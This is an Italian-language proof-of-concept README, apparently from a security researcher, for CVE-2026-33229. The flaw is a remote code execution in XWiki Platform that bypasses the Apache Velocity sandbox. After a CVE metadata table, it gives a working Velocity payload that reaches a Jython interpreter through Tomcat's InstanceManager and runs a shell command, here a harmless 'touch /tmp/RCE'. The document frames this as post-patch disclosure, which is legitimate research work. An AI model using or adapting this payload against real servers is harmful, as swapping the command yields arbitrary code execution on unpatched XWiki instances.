
Proof-of-concept exploit per CVE-2026-33229, una RCE su XWiki tramite bypass della sandbox di Apache Velocity, con dettagli tecnici e un payload funzionante.
Una vulnerabilità di Remote Code Execution in XWiki Platform che consente a un utente autenticato con permessi di scripting di bypassare completamente la sandbox di Apache Velocity — senza bisogno di Java Reflection — attraversando oggetti pre-istanziati già presenti nel contesto Velocity.
📄 Dettagli tecnici completi: youssefazefzaf.com/posts/cve
| Campo | Valore |
|---|
| ID CVE | CVE-2026-33229 |
| Prodotto interessato | XWiki Platform |
| Componente | Renderer macro Velocity, parametro titolo pagina |
| Privilegi richiesti | Autenticato + permesso Script |
| Impatto | Remote Code Execution |
| GHSA | GHSA-h259-74h5-4rh9 |
| Scoperta | 7 novembre 2025 |
| Corretta | 10 dicembre 2025 |
| Divulgata | 8 aprile 2026 |
$request.request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')")
Nota sulla divulgazione responsabile: PoC pubblicato dopo la disponibilità della patch. Non utilizzare contro sistemi di cui non si è proprietari.